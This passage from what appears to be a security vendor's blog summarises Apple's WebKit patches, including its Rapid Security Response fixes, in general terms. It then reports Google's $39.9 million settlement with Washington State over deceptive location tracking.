  • CVE-2023-32409: An issue where remote attacker may be able to break out of Web Content sandbox was addressed with improved bounds checks.

The notes about the security updates also revealed some information about the Apple’s Rapid Security Response (RSR) update we reported about earlier this month.

RSR is a new type of software patch delivered between Apple’s regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They’re meant to make the deployment of security improvements faster and more frequent.

We now know that the CVEs patched in that RSR update are listed as:

  • CVE-2023-28204: An out-of-bounds read issue in WebKit was addressed with improved input validation. Processing web content may disclose sensitive information.
  • CVE-2023-32373: A use-after-free issue in WebKit which was addressed with improved memory management. Processing maliciously crafted web content may lead to arbitrary code execution.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Google to pay $40m for “deceptive and unfair” location tracking practices

Google is going to pay $39.9 million to Washington State to put to rest a lawsuit about its location tracking practices which has been in play since last year. Google was accused of “misleading consumers” by State Attorney General Bob Ferguson. From the AG press release:

Attorney General Bob Ferguson today announced Google will pay $39.9 million to Washington state as a result of his office’s lawsuit over misleading location tracking practices. Google will also implement a slate of court-ordered reforms to increase transparency about its location tracking settings.

Ferguson’s lawsuit against Google asserted that the tech giant deceptively led consumers to believe that they have control over how Google collects and uses their location data. In reality, consumers could not effectively prevent Google from collecting, storing and profiting from their location data.

The lawsuit itself, announced back in January 2022, claimed Google used a “number of deceptive and unfair practices” to obtain user content for tracking. Practices highlighted included “hard to find” location settings, misleading descriptions of location settings, and “repeated nudging” to enable location settings alongside incomplete disclosures of Google’s location data collection.

These practices were set alongside the large amount of profit Google generated from using consumer data to sell advertising. Google made close to $150 billion from advertising in 2020, and the case pointed out that location data is a key component of said advertising. As per the Attorney General:

(Google) has a financial incentive to dissuade users from withholding access to that data.

The location based argument is focused on the discrepancy between claims related to what data Google stores in theory with location data turned off, and what it obtains in practice:

When users enable a setting called “Location History,” Google saves data on users’ location to, as it says in its account settings, “give you personalised maps, recommendations based on places you’ve visited, and more.”

Google told users that when Location History was disabled, the company did not continue to store the user’s location. For years, Google’s help page stated, “With Location History off, the places you go are no longer stored.” That statement was false. For example, the company collects location data under a separate setting — “Web & App Activity” — that is defaulted “on” for all Google Accounts.

The consent decree filed on Wednesday means Google will need to be more transparent with regard to tracking. The search engine giant will also need to provide more detailed information in cases where location technologies are involved.

AG Ferguson had this to say:

Google denied Washington consumers the ability to choose whether the company could track their sensitive location data, deceived them about their privacy options and profited from that conduct. Today’s resolution holds one of the most powerful corporations accountable for its unethical and unlawful tactics.

Google has been on the receiving end of legal action led by Ferguson for some time now. Just last month, he partnered with the US Department of Justice and a bipartisan group of attorneys general for an antitrust lawsuit aiming to break up Google’s monopolisation of display advertising. There have also been other antitrust lawsuits in this space, and in 2021 Google paid $423,659.76 in relation to violating the state’s campaign finance disclosure law.

We still don’t know how these proposed changes will take shape in terms of what consumers will see. “…with no federal law governing online privacy in the United States, state regulators are forced to make do with what they have” according to Android Central. With Ferguson showing no signs of letting up, Washington State is taking that philosophy to the max.


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW